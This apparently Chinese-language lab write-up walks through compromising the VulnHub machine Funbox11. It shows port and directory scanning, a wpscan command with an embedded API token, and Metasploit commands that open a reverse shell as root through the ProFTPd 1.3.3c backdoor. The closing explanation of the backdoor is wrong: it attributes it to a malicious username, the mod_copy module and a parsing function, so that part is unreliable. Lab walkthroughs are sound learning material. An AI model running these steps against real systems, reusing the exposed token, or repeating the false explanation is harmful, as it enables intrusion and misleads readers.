目录
下载链接
官方链接:VulnHub
靶场下载链接:https://download.vulnhub.com/funbox/Funbox11.ova
靶场搭建
攻击机:
靶机:
信息收集
端口扫描
nmap扫描服务,发现有很多的端口,我们先去看看80端口,访问一下网站
没有东西,我们点点蓝色字体看看里面会不会有东西。
hosts重定向
发现跳转到funbox11,那么好又是重定向,我们对/etc/hosts文件进行编辑。
刷新一下页面
目录扫描
接下来扫描一下目录
有WordPress,那么我们访问一下,并用给wpscan工具扫描一下有没有可以利用的漏洞。
wpscan --url http://funbox11/wp-admin/install.php -e --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ
发现并没有什么可以利用的漏洞,那么我们只好先跳过这个。我们试试能不能通过其他端口进行渗透。
漏洞利用
我们先搜搜ftp有啥漏洞,没想到还真给我搜到了。
那么我们试试利用这个漏洞,进行渗透
use 0
show payload
set payload payload/cmd/unix/reverse
set rhosts 192.168.4.183
set lhost 192.168.4.50
run
直接就是root权限,完结!!!!!!!!!!!!!!!
ProFTPd-1.3.3c - Backdoor Command Execution
ProFTPd-1.3.3c - Backdoor Command Execution POC
这个漏洞的相关原理大家可自行上网上搜索。我就讲讲我对这个漏洞的原理的一些理解,可能有错误希望谅解。
攻击者在FTP客户端中构造一个特殊的FTP命令,其中包含恶意用户名。这个恶意用户名被设计成包含特定的字符串,能够绕过身份验证并利用mod_copy模块的后门。在ProFTPD服务器接收到这个恶意命令时,它会解析命令中的用户名,并触发mod_copy模块中的漏洞代码。这个漏洞代码会识别到恶意命令中的特殊字符串,并执行该命令,从而导致攻击者可以在服务器上执行任意命令。
在解析过程中,pr_fnvlist_parse
函数会检查用户名中的特定字符串,并识别出后门代码的存在。一旦识别到后门代码的存在,攻击者构造的恶意命令中的恶意部分将被解析为可执行的命令,并在服务器上执行。